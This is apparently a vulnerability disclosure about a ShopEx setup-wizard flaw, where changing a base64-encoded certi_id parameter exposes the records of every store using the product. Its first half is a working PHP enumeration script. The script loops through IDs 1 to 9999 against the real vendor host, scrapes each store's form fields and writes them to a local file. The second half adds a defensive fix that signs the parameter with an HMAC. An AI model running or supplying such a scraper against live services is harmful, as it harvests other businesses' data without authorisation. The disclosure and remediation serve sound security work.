Brief description:
A flaw in a ShopEx interface allows enumerating every site that uses it.

Details:
The problem is in the ShopEx online-store setup wizard page:

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

The refer parameter base64-decodes to {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

By changing certi_id we can enumerate all websites that use the ShopEx program.
<?php
// Walk certi_id values 1..9999 (loop bounds as in the original)
for ($i = 1; $i < 10000; $i++) {
    ShowshopExD($i);
}

function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';
    // Build the refer parameter: base64 of the JSON structure the wizard expects
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url . '?refer=' . $refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    $result = curl_exec($ch);
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The wizard echoes the refer value back when the certi_id exists
    if (strpos($result, $refer) !== false) {
        $fp = fopen("c:/shopEx.txt", 'ab'); // append results to file
        // Pull every text input field out of the wizard form
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res);
            if (empty($res[1])) {
                continue; // input without name/value attributes
            }
            echo $res[1][0] . ':' . $res[3][0] . "\r\n";
            $col = $res[1][0] . ':' . $res[3][0] . "\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------' . "\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
Proof of vulnerability:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
Change refer to a different encryption method.
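An added example of the kind of fix this points at, not ShopEx's own code: the refer value stays readable JSON, but a server-side HMAC is appended so a client that re-encodes the payload with a different certi_id is rejected. The key source (REFER_SIGNING_KEY) and the function names are assumptions; the server should additionally check that the certi_id belongs to the requesting account, since the signature only prevents tampering.

```php
<?php
// Added example, not ShopEx's code. The signing key must be a server-side secret;
// the environment variable name is a placeholder assumption.
$SECRET_KEY = getenv('REFER_SIGNING_KEY') ?: 'REPLACE_WITH_32_RANDOM_BYTES';

// Build a refer token: base64(json) . "." . base64(HMAC-SHA256(json)).
// Apply rawurlencode() when placing the result in a query string.
function make_refer(int $certi_id, string $callback_url, string $key): string {
    $payload = json_encode(['certi_id' => $certi_id, 'callback_url' => $callback_url]);
    $sig = hash_hmac('sha256', $payload, $key, true);
    return base64_encode($payload) . '.' . base64_encode($sig);
}

// Verify a refer token; returns the decoded array, or null if malformed or tampered.
function verify_refer(string $token, string $key): ?array {
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $payload = base64_decode($parts[0], true);
    $sig = base64_decode($parts[1], true);
    if ($payload === false || $sig === false) {
        return null;
    }
    $expected = hash_hmac('sha256', $payload, $key, true);
    if (!hash_equals($expected, $sig)) { // constant-time comparison
        return null;
    }
    $data = json_decode($payload, true);
    if (!is_array($data) || !isset($data['certi_id'], $data['callback_url'])) {
        return null;
    }
    return $data;
}

// Token issued legitimately for certi_id 1051 (the id seen in the report)
$token = make_refer(1051, 'http://www.joyogame.net/', $SECRET_KEY);
var_dump(verify_refer($token, $SECRET_KEY));

// A client swaps in a neighbouring certi_id but cannot produce a matching signature
[$payloadB64, $sigB64] = explode('.', $token, 2);
$forgedPayload = json_encode(['certi_id' => 1052, 'callback_url' => 'http://www.joyogame.net/']);
var_dump(verify_refer(base64_encode($forgedPayload) . '.' . $sigB64, $SECRET_KEY));
```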